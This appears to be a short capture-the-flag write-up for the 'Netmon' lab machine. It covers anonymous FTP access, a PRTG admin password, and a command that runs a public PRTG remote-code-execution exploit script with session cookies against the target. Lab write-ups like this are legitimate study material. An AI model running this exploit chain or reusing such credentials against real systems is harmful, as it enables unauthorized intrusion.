## Recon ### FTP - anon - permitted - ### `PRT Configuration.dat` ![[Pasted image 20250305213657.png]] ### Website ![[Pasted image 20250305191813.png]] ![[Pasted image 20250305195320.png]] [vendor site - paessler](https://www.paessler.com/monitoring/network/network-monitoring-tool) [PRTG manual](https://www.paessler.com/manuals/prtg) ## Initial Acces Website authentication: `prtgadmin:PrTg@admin2019` Achieve RCE: https://www.exploit-db.com/exploits/46527 ```sh ╭─[λ]-[/targets/netmon/initial-access]-[10.10.10.152] ╰─> ./46527.sh -u http://netmon.htb -c "_ga=GA1.4.336652606.1741198554; _gid=GA1.4.2083377700.1741198554; OCTOPUS1813713946=ezVBNjhFMDhGLTNGQzYtNDI0Qi04NjI2LTRDMzBGMTM1QkVEOH0%3D; _gat=1" ```